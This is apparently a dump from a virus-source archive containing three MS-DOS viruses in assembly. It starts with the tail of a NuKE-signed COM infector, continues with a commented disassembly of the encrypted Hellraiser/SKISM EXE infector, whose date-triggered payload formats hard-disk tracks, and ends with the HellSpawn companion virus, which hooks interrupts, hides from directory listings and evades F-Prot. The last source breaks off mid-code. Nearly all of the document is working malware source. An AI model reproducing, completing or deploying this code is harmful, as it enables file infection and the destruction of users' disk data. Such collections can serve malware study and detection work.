mov ah,0FFh ; Clean code, yeaah suuure
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe we_be_good ; If it's small enough continue
jmp infection_done ; Otherwise exit
we_be_good: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ah,0FFh ; Clean code
xor ah,ah ; Clean the registers
mov ah,0FFh ; Clean code again
xor ah,ah ; Clean the registers
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jum
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file
add ax,finish - start ; Re-adjust to make the jum
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,0BCFEh ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
not ax
int 021h
mov ax,0C2FDh ; DOS open file function, r/w
not ax
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
xor ah,ah ; Clear Registers
xor ax,ax
mov ax,0BDFDh ; DOS file seek function, EOF
not ax
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
mov ah,69h
mov ah,040h ; DOS write to file function
mov cx,finish - start; CX holds virus length
lea dx,[di + start] ; DX points to start of virus
int 021h
mov ah,69h
xor ax,ax
mov ax,0A8FEh ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
not ax
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,0BCFEh ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
not ax
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if fa
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_hour proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,ch ; Copy hour into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_hour endp
note db ' 1234567890!@#$%^&*()ascii '
db ' (c) Ba Ba Stupid... '
db ' Remember Studderin' John '
db ' Robin, I love You! '
db ' Long Live [NuKE] '
db 12h,13h,17h,19h
db ' Georgia needs Howard Stern'
finish label near
code ends
end main
MSDOS/H-Index/Virus.MSDOS.Unknown.hr.asm
+412
View File
@@ -0,0 +1,412 @@
;NAME: HR.DEC
;FILE SIZE: 0062Ch - 1580d
;START (CS:IP): 00100h
;CODE END: 0072Ch
;CODE ORIGIN: 00100h
;DATE: Sun Aug 02 17:20:02 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
START: JMP Short BEGIN
;---------------------------------------------------
NOP
ENCRKEY:DB 0Ch,32h ; 32h may not be needed... ;OR AH,32
BEGIN: CALL CRYPT ; Decrypt the virus
JMP H00520
;---------------------------------------------------
CRYPT: PUSH CX
MOV SI,OFFSET MESSAGE
MOV DI,SI
MOV CX,0766h
CLD
LOOP_1: LODSW
XOR AX,DS:ENCRKEY ;DS may not be needed
STOSW
DEC CX
JNZ LOOP_1
POP CX
RET
;---------------------------------------------------
INFECT: MOV DX,0100h ;Offset to begin at
MOV BX,DS:[HANDLE] ;BX=File handle
PUSH BX ;I don't know why, BX doesn't change.
MOV CX,062Ch ;CX=number of bytes to write
CALL CRYPT ;Encrypt before saving
POP BX ;I don't know why, BX doesn't change.
MOV AX,4000h ;AH = 40h, write to file.
INT 21h ;Infect the file.
PUSH BX ;Again, BX never changes.
CALL CRYPT ; . . . . . . . . .
POP BX
RET ;RET_Near
;---------------------------------------------------
; This is the big, red, block letters that shows when it goes off.
MESSAGE:
DB 0Fh,10h,18h,19h,1Fh,"I'll be back..."
DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h
DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh
DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h
DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h
DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh
DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h
DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h
DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h
DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h
DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h
DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h
DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h
DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h
DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h
DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h
DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h
DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h
DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h
DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h
DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h
DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h
DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h
DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah
;---------------------------------------------------
DB 00 ;00454
DB "*.EXE" ;00455
DB 00h,"\",00h,03h ;0045A
DB 8 DUP("?") ;0045E 3F
DB " " ;00466 202020
;---------------------------------------------------
;This area is perplexing. Doesn't seem to be ever called, nor read from.
ADC AX,[BP+DI] ;00469 1303 __
ADD [BX+SI],AL ;0046B 0000 __
ADD [BP+SI],CH ;0046D 002A _*
SHR BP,1 ;0046F D1ED __
DEC DX ;00471 4A J
ADC DL,DS:[0E278h] ;00472 121678E2 __x_
PUSH SS ;00476 16 _
ADD [BX+SI],AL ;00477 0000 __
ADD [BX+SI],AL ;00479 0000 __
;---------------------------------------------------
DB "ARMOR" ;0047B 41524D4F52
DB 00h ;00480
DB " " ;00481 2020
DB 00h ;00483
DB 00h ;00484
DB 00h ;00485
DB 00h ;00486
DB 00h ;00487
DB 03h ;00488
DB 8 DUP("?") ;00489 3F
DB "EXE" ;00491 455845
DB 07h ;00494
DB 04h ;00495
DB 00h ;00496
DB "3" ;00497 33
DB 1Fh ;00498
DB "*" ;00499 2A
DB 0D1h ;0049A
DB 0EDh ;0049B
DB "J " ;0049C 4A20
DB 02h ;0049E
DB "x" ;0049F 78
DB 0F0h ;004A0
DB 16h ;004A1
DB 02h ;004A2
DB 00h ;004A3
DB 00h ;004A4
DB 00h ;004A5
DB "SAMPLE3.EXE" ;004A6 53414D504C4533
DB 00h ;004B1
DB 00h ;004B2
DB 9Eh ;004B3
DB "-]" ;004B4 2D5D
DB 04h ;004B6
DB 88h ;004B7
DB 04h ;004B8
DB 9Eh ;004B9
DB "-" ;004BA 2D
DB 00h ;004BB
DB "ARMOR" ;004BC 41524D4F52
DB 00h ;004C1
DB 58 DUP(00h) ;004C2
HANDLE: DB 05h ;004FC
DB 00h ;004FD
DB 02h ;004FE
DB "x" ;004FF 78
DB 0F0h ;00500
DB 16h ;00501
DB " " ;00502 20
DB 00h ;00503
DB 0CDh ;00504
DB " " ;00505 20
DB 00h ;00506
DB 00h ;00507
DB "Written by Dennis Yelle" ;00508 5772697474656E
DB 00h ;0051F
;---------------------------------------------------
; Create new encryption key
H00520: MOV AX,3000h ;00520 B80030 __0
INT 21h ;2-DOS_Ver ;00523 CD21 _!
CMP AL,02h ;00525 3C02 <_
JB H0056B ;00527 7242 rB
MOV AH,2Ch ;00529 B42C _,
INT 21h ;1-Get_Time ;0052B CD21 _!
MOV DS:[0103h],DX ;0052D 89160301 ____
; Check to see if it's the last Friday in month, if so, go off.
H00531: MOV AH,2Ah ;00531 B42A _*
INT 21h ;1-Get_Date ;00533 CD21 _!
CMP DL,19h ;00535 80FA19 ___
JL H0053E ;00538 7C04 |_
CMP AL,05h ;0053A 3C05 <_
JZ H00541 ;0053C 7403 t_
H0053E: JMP H005F2 ;0053E E9B100 ___
;---------------------------------------------------
; GO OFF!
H00541: MOV AH,0Fh ;00541 B40F
INT 10h ;Get current vid mode ;00543 CD10
CMP AL,07h ;00545 3C07
JZ H00568 ;If mono, format ;00547 741F
MOV AX,0003h ;80x25 16 color ;00549 B80300
INT 10h ;Set video mode ;0054C CD10
MOV AH,01h ;0054E B401
MOV CX,0808h ;No cursor ;00550 B90808
INT 10h ;Set cursor size ;00553 CD10
MOV SI,013Ah ;00555 BE3A01
MOV AX,0B800h ;Video segment ;00558 B800B8
MOV ES,AX ;ES_Chg ;0055B 8EC0
MOV DI,0000h ; ;0055D BF0000
MOV CX,0319h ;00560 B91903
CALL H0057E ; . . . . . . . . . ;00563 E81800
JMP Short H00531 ;00566 EBC9
;---------------------------------------------------
H00568: JMP Short H005DC ;00568 EB72 _r
;---------------------------------------------------
NOP ;0056A 90 _
H0056B: JMP H0061E ;0056B E9B000 ___
;---------------------------------------------------
DB " -=PHALCON=- " ;0056E 20202D3D504841
DB 00h ;0057D
;---------------------------------------------------
; Display message... TheDraw algorythm for unpacking image.
H0057E: JCXZ H005DB ;Jumps to a ret ;0057E E35B _[
MOV DX,DI ;00580 8BD7 __
XOR AX,AX ;00582 33C0 3_
CLD ;00584 FC _
H00585: LODSB ;Take a byte ;00585 AC _
CMP AL,20h ;If it's <space ;00586 3C20 <
JB H0058F ;Jump ;00588 7205 r_
STOSW ;Move to screen ;0058A AB _
H0058B: LOOP H00585 ;0058B E2F8 __
JMP Short H005DB ;0058D EB4C _L
;---------------------------------------------------
H0058F: CMP AL,10h ;If it's not<10h ;0058F 3C10 <_
JNB H0059A ;Jump ;00591 7307 s_
AND AH,0F0h ;00593 80E4F0 ___
OR AH,AL ;00596 0AE0 __
JMP Short H0058B ;00598 EBF1 __
;---------------------------------------------------
H0059A: CMP AL,18h ;0059A 3C18 <_
JZ H005B1 ;0059C 7413 t_
JNB H005B9 ;0059E 7319 s_
SUB AL,10h ;005A0 2C10 ,_
ADD AL,AL ;005A2 02C0 __
ADD AL,AL ;005A4 02C0 __
ADD AL,AL ;005A6 02C0 __
ADD AL,AL ;005A8 02C0 __
AND AH,8Fh ;005AA 80E48F ___
OR AH,AL ;005AD 0AE0 __
JMP Short H0058B ;005AF EBDA __
;---------------------------------------------------
H005B1: ADD DX,00A0h ;005B1 81C2A000 ____
MOV DI,DX ;005B5 8BFA __
JMP Short H0058B ;005B7 EBD2 __
;---------------------------------------------------
H005B9: CMP AL,1Bh ;005B9 3C1B <_
JB H005C4 ;005BB 7207 r_
JNZ H0058B ;005BD 75CC u_
XOR AH,80h ;005BF 80F480 ___
JMP Short H0058B ;005C2 EBC7 __
;---------------------------------------------------
H005C4: CMP AL,19h ;005C4 3C19 <_
MOV BX,CX ;005C6 8BD9 __
LODSB ;005C8 AC _
MOV CL,AL ;005C9 8AC8 __
MOV AL,20h ;005CB B020 _
JZ H005D1 ;005CD 7402 t_
LODSB ;005CF AC _
DEC BX ;005D0 4B K
H005D1: XOR CH,CH ;005D1 32ED 2_
INC CX ;005D3 41 A
REPZ STOSW ;005D4 F3AB __
MOV CX,BX ;005D6 8BCB __
DEC CX ;005D8 49 I
LOOPNZ H00585 ;005D9 E0AA __
H005DB: RET ;RET_Near ;005DB C3 _
;End of display message procedure
;---------------------------------------------------
H005DC: MOV AH,15h ;005DC B415 __
MOV DL,80h ;005DE B280 __
INT 13h ;BAT-Dsk_Type ;005E0 CD13 __
CMP AH,03h ;005E2 80FC03 ___
JNZ H005F2 ;005E5 750B u_
MOV AX,0504h ;005E7 B80405 ___
MOV CX,DS:[0103h] ;005EA 8B0E0301 ____
MOV DL,80h ;005EE B280 __
INT 13h ;B-Fmt_FD_Trk ;005F0 CD13 __
H005F2: MOV DX,045Dh ;005F2 BA5D04 _]_
MOV AH,1Ah ;005F5 B41A __
INT 21h ;1-Set_DTA ;005F7 CD21 _!
MOV AH,19h ;005F9 B419 __
INT 21h ;1-Get_Cur_Dr ;005FB CD21 _!
MOV DL,AL ;005FD 8AD0 __
INC DL ;005FF FEC2 __
MOV AH,47h ;00601 B447 _G
MOV SI,04BCh ;00603 BEBC04 ___
INT 21h ;2-Cur_Dir ;00606 CD21 _!
MOV DX,045Bh ;00608 BA5B04 _[_
MOV AH,3Bh ;0060B B43B _;
INT 21h ;2-Chg_Dir ;0060D CD21 _!
MOV CX,0013h ;0060F B91300 ___
MOV DX,0453h ;00612 BA5304 _S_
MOV AH,4Eh ;00615 B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;00617 CD21 _!
CMP AX,0012h ;00619 3D1200 =__
JNZ H00621 ;0061C 7503 u_
H0061E: JMP Short H00671 ;0061E EB51 _Q
;---------------------------------------------------
NOP ;00620 90 _
H00621: MOV AH,4Fh ;00621 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00623 CD21 _!
CMP AX,0012h ;00625 3D1200 =__
JZ H00671 ;00628 7447 tG
MOV DX,047Bh ;0062A BA7B04 _{_
MOV AH,3Bh ;0062D B43B _;
INT 21h ;2-Chg_Dir ;0062F CD21 _!
MOV AH,2Fh ;00631 B42F _/
INT 21h ;2-Get_DTA ;00633 CD21 _!
MOV DS:[04B3h],ES ;00635 8C06B304 ____
MOV DS:[04B5h],BX ;00639 891EB504 ____
MOV DX,0488h ;0063D BA8804 ___
MOV AH,1Ah ;00640 B41A __
INT 21h ;1-Set_DTA ;00642 CD21 _!
MOV CX,0007h ;00644 B90700 ___
MOV DX,0455h ;00647 BA5504 _U_
MOV AH,4Eh ;0064A B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;0064C CD21 _!
CMP AX,0012h ;0064E 3D1200 =__
JNZ H00674 ;00651 7521 u!
H00653: MOV AH,4Fh ;00653 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00655 CD21 _!
CMP AX,0012h ;00657 3D1200 =__
JNZ H00674 ;0065A 7518 u_
MOV DX,045Bh ;0065C BA5B04 _[_
MOV AH,3Bh ;0065F B43B _;
INT 21h ;2-Chg_Dir ;00661 CD21 _!
MOV AH,1Ah ;00663 B41A __
MOV DS,DS:[04B3h] ;DS_Chg ;00665 8E1EB304 ____
MOV DX,DS:[04B5h] ;00669 8B16B504 ____
INT 21h ;1-Set_DTA ;0066D CD21 _!
JMP Short H00621 ;0066F EBB0 __
;---------------------------------------------------
H00671: JMP Short H006EC ;00671 EB79 _y
;---------------------------------------------------
NOP ;00673 90 _
H00674: MOV AH,2Fh ;00674 B42F _/
INT 21h ;2-Get_DTA ;00676 CD21 _!
MOV DS:[04B9h],ES ;00678 8C06B904 ____
MOV DS:[04B7h],BX ;0067C 891EB704 ____
MOV DX,04A6h ;00680 BAA604 ___
MOV BX,0488h ;00683 BB8804 ___
MOV AX,[BX+18h] ;00686 8B4718 _G_
MOV DS:[0500h],AX ;00689 A30005 ___
MOV AX,[BX+16h] ;0068C 8B4716 _G_
MOV DS:[04FEh],AX ;0068F A3FE04 ___
MOV AX,[BX+15h] ;00692 8B4715 _G_
MOV AX,4300h ;00695 B80043 __C
INT 21h ;2-Fl_Hdl_Attr ;00698 CD21 _!
MOV DS:[0502h],CX ;0069A 890E0205 ____
MOV AX,4301h ;0069E B80143 __C
XOR CX,CX ;006A1 33C9 3_
INT 21h ;1-TERM_norm:21h-00h;006A3 CD21 _!
;---------------------------------------------------
MOV AX,3D00h ;006A5 B8003D __=
INT 21h ;2-Open_Fl_Hdl ;006A8 CD21 _!
JB H006CF ;006AA 7223 r#
MOV DS:[HANDLE],AX ;006AC A3FC04 ___
MOV AH,3Fh ;006AF B43F _?
MOV BX,DS:[HANDLE] ;006B1 8B1EFC04 ____
MOV CX,0002h ;006B5 B90200 ___
MOV DX,0504h ;006B8 BA0405 ___
INT 21h ;2-Rd_Fl_Hdl ;006BB CD21 _!
MOV AH,3Eh ;006BD B43E _>
MOV BX,DS:[HANDLE] ;006BF 8B1EFC04 ____
INT 21h ;2-Close_Fl_Hdl ;006C3 CD21 _!
MOV BX,DS:[0504h] ;006C5 8B1E0405 ____
CMP BX,03EBh ;006C9 81FBEB03 ____
JNZ H006DE ;006CD 750F u_
H006CF: MOV AH,1Ah ;006CF B41A __
MOV DS,DS:[04B9h] ;DS_Chg ;006D1 8E1EB904 ____
MOV DX,DS:[04B7h] ;006D5 8B16B704 ____
INT 21h ;1-Set_DTA ;006D9 CD21 _!
JMP H00653 ;006DB E975FF _u_
;---------------------------------------------------
H006DE: MOV DX,04A6h ;006DE BAA604 ___
MOV AX,3D02h ;006E1 B8023D __=
INT 21h ;2-Open_Fl_Hdl ;006E4 CD21 _!
MOV DS:[HANDLE],AX ;006E6 A3FC04 ___
CALL INFECT ; . . . . . . . . . ;006E9 E834FA _4_
H006EC: MOV AX,5701h ;006EC B80157 __W
MOV BX,DS:[HANDLE] ;006EF 8B1EFC04 ____
MOV CX,DS:[04FEh] ;006F3 8B0EFE04 ____
MOV DX,DS:[0500h] ;006F7 8B160005 ____
INT 21h ;2-Fl_Hdl_Date_Time ;006FB CD21 _!
MOV AX,4301h ;006FD B80143 __C
MOV CX,DS:[0502h] ;00700 8B0E0205 ____
MOV DX,04A6h ;00704 BAA604 ___
INT 21h ;2-Fl_Hdl_Attr ;00707 CD21 _!
MOV AH,3Bh ;00709 B43B _;
MOV DX,045Bh ;0070B BA5B04 _[_
INT 21h ;2-Chg_Dir ;0070E CD21 _!
MOV AH,3Bh ;00710 B43B _;
MOV DX,04BCh ;00712 BABC04 ___
INT 21h ;2-Chg_Dir ;00715 CD21 _!
MOV AX,4C00h ;00717 B8004C __L
INT 21h ;2-TERM_w_Ret_Cd ;0071A CD21 _!
;---------------------------------------------------
DB "Hellraiser/SKISM" ;0071C 48656C6C726169
;---------------------------------------------------
P00100 ENDP
CODE ENDS
END H00100
;-------------------------------------------------------------------------------
MSDOS/H-Index/Virus.MSDOS.Unknown.hspawn.asm
+580
View File
@@ -0,0 +1,580 @@
; HellSpawn Virus (c) 1993 by Stormbringer
;
;
; Ò Stormbringer
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄ
; Ð
.model tiny
.radix 16
.code
org 100
start:
jmp EntryPoint
FindZero:
lodsb
or al,al
jne FindZero
cmp ds:[si-4],'XE'
je InfectOnOpen
cmp ds:[si-4],'OC'
jne Doneopen
OpenRequestedFile:
mov ax,3d00
pushf
call dword ptr cs:[IP_21]
xchg bx,ax
xor cx,cx
xor dx,dx
mov ax,4202
call FakeInt21
cmp ax,endmain-start
jne CloseUp
pop di si ds es dx cx bx ax
stc
retf 002
CloseUp:
jc CloseUp
mov ah,3e
call FakeInt21
doneOPen:
pop di si ds es dx cx bx ax
jmp Go21
InfectOnOpen:
pop di si ds es dx cx bx ax
jmp Execute
NewOpen:
push ax bx cx dx es ds si di
mov dx,si
jmp FindZero
Open:
push ax bx cx dx es ds si di
mov si,dx
jmp FindZero
Terminateprog:
mov byte ptr cs:[StealthOn],1
jmp Go21
Int21:
cmp ah,4c
je Terminateprog
or ah,ah
je Terminateprog
cmp byte ptr cs:[StealthOn],0
je AfterStealthChecks
cmp ah,11h
je FindFile
cmp ah,12h
je FindFile
cmp ah,4eh
je FindHandle
cmp ah,4fh
je FindHandle
AfterStealthChecks:
cmp ax,6c00
je NewOpen
cmp ah,3dh
je Open
cmp ax,4b00h
jne Go21
jmp Execute
Go21:
jmp dword ptr cs:[IP_21]
FindHandle:
pushf
call dword ptr cs:[IP_21]
jc ErrorHandleCall
push ax bx cx dx es ds si di
GetDTA:
mov ah,2f
call FakeInt21
cmp word ptr es:[bx+1a],endmain-start ;Check size
jne EndHandle
mov ah,byte ptr es:[bx+15]
and ah,2
jz Endhandle
pop di si ds es dx cx bx ax
mov ah,4f
jmp FindHandle
EndHandle:
pop di si ds es dx cx bx ax
clc
DoneHandleStealth:
retf 02
ErrorHandleCall:
mov ah,12
retf 02
FindFile:
call FakeInt21
cmp al,0ff
je ErrorFF
Stealth:
push ax bx cx dx es ds si di
mov ah,2f
call FakeInt21
cmp byte ptr es:[bx],0ff
jne NotExtended
add bx,7
NotExtended:
cmp word ptr [bx+9],'OC'
jne DoneFF
cmp word ptr [bx+1dh],endmain-start
jne DoneFF
FindNextFile:
pop di si ds es dx cx bx ax
mov ah,12
jmp FindFile
DoneFF:
pop di si ds es dx cx bx ax
iret
ErrorFF:
mov al,0ff
iret
Execute:
push ax bx cx dx es ds si di
call SetCritical
mov si,dx
FindEndOfFilename:
lodsb
or al,al
jne FindEndOfFilename
CheckForCHKDSK:
cmp word ptr ds:[si-9],'DK'
jne AfterChkdsk
mov byte ptr cs:[StealthOn],0
AfterChkdsk:
cmp byte ptr ds:[si-0a],'-' ;If it's f-prot, exit
je EndExec
cmp word ptr ds:[si-4],'XE'
jne EndExec
mov si,dx
mov di,offset filename
push cs
pop es
CopyFilename:
lodsb
stosb
or al,al
jne CopyFilename
push cs
pop ds
ChangeToCom:
mov word ptr es:[di-4],'OC'
mov byte ptr es:[di-2],'M'
CheckIfThere:
mov ax,3d00
mov dx,offset filename
call FakeInt21
xchg bx,ax
jnc CloseVirus
PlaceVirus:
mov ah,3c
mov cx,2
mov dx,offset Filename
call FakeInt21
jc EndEXEC
WriteVirus:
inc byte ptr [InfectionCounter]
xchg bx,ax
mov ah,40
mov cx,endmain-start
mov dx,100
call FakeInt21
CloseVirus:
mov ah,3e
call FakeInt21
EndExec:
call ResetCritical
pop di si ds es dx cx bx ax
jmp Go21
Error13:
stc
retf 02
Int13:
cmp ah,02
je IsDiskRead
jmp GoInt13
IsDiskRead:
pushf
call dword ptr cs:[IP_13]
jc Error13
AbsStealth:
push ax bx cx dx es ds si di
push cs
pop ds
mov di,bx
mov si,100
mov cx,100
repz cmpsb
jcxz IsVirus
jmp DoneAbsStealth
IsVirus:
mov di,bx
mov ax,9090
mov cx,0fe
repnz stosw
mov ax,20cdh
stosw
DoneAbsStealth:
pop di si ds es dx cx bx ax
clc
retf 002
EntryPoint:
push ds
mov ax,ds
dec ax
mov ds,ax
mov byte ptr ds:[0],'Z' ;Mark as last in chain
sub word ptr ds:[03],80 ;Allocate Space From MCB (2k)
sub word ptr ds:[12],80 ;Allocate Space From PSP (2k)
xor ax,ax
mov ds,ax
dec word ptr ds:[413] ;Allocate Memory From Bios (2k)
dec word ptr ds:[413]
mov ax,word ptr ds:[413]
CopyVirusToMem:
mov cl,6
shl ax,cl
sub ax,10
mov es,ax
pop ds
push ds
mov si,100
mov di,100
mov cx,end_prog-start
repnz movsb
;BX = IP of new int, CX = CS, DX = IntNum
;DI = address of interrupt storage
SetInterrupts:
xor ax,ax
mov ds,ax
cli
SetInt21:
mov ax,offset Int21
mov bx,es
xchg ax,word ptr ds:[21*4]
xchg bx,word ptr ds:[21*4+2]
mov word ptr es:[IP_21],ax
mov word ptr es:[CS_21],bx
SetInt13:
mov ax,offset Int13
mov bx,es
xchg ax,word ptr ds:[13*4]
xchg bx,word ptr ds:[13*4+2]
mov word ptr es:[IP_13],ax
mov word ptr es:[CS_13],bx
SetInt10:
mov ax,offset Int10
mov bx,es
xchg ax,word ptr ds:[10*4]
xchg bx,word ptr ds:[10*4+2]
mov word ptr es:[IP_10],ax
mov word ptr es:[CS_10],bx
SetInt1c:
mov ax,offset Int1c
mov bx,es
xchg ax,word ptr ds:[1c*4]
xchg bx,word ptr ds:[1c*4+2]
mov word ptr es:[IP_1c],ax
mov word ptr es:[CS_1c],bx
SetInt09:
mov ax,offset Int09
mov bx,es
xchg ax,word ptr ds:[09*4]
xchg bx,word ptr ds:[09*4+2]
mov word ptr es:[IP_09],ax
mov word ptr es:[CS_09],bx
sti
push cs
pop ds
mov byte ptr cs:[StealthOn],1
RunOriginalProgram:
mov ax,ds:[2c]
mov ds,ax
xor si,si
FindPath:
lodsw
or ax,ax
je FoundPath
dec si
jmp FindPath
FoundPath:
lodsw
ChangeFilenameToEXE:
push ds
pop es
mov di,si
xor al,al
mov cx,0ff
repnz scasb
mov word ptr es:[di-4],'XE'
mov byte ptr es:[di-2],'E'
push cs
pop es
mov ah,4a
mov bx,(end_prog-start+10f)/10
int 21
mov cx,di
sub cx,si
dec cx
mov di,offset Filename
mov al,cl
stosb
repnz movsb
mov byte ptr es:[di],0dh
mov si,offset Filename
push cs
pop ds
int 2e ;Execute Command
mov ax,4c00
int 21
FakeInt21:
pushf
call dword ptr cs:[IP_21]
ret
SetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,offset CriticalHandler
mov bx,cs
cli
xchg ds:[24*4],ax
xchg ds:[24*4+2],bx
mov word ptr cs:[CS_24],bx
mov word ptr cs:[IP_24],ax
sti
pop ds bx ax
ret
ResetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,word ptr cs:[IP_24]
mov bx,word ptr cs:[CS_24]
cli
mov word ptr ds:[24*4],ax
mov word ptr ds:[24*4+2],bx
sti
pop ds bx ax
ret
CriticalHandler:
mov al,3
iret
Credits db 'HellSpawn v0.91a (c) 1993 by Stormbringer'
EndCred:
Int10:
cmp ah,0
jne GoInt10
mov byte ptr cs:[FireActive],0
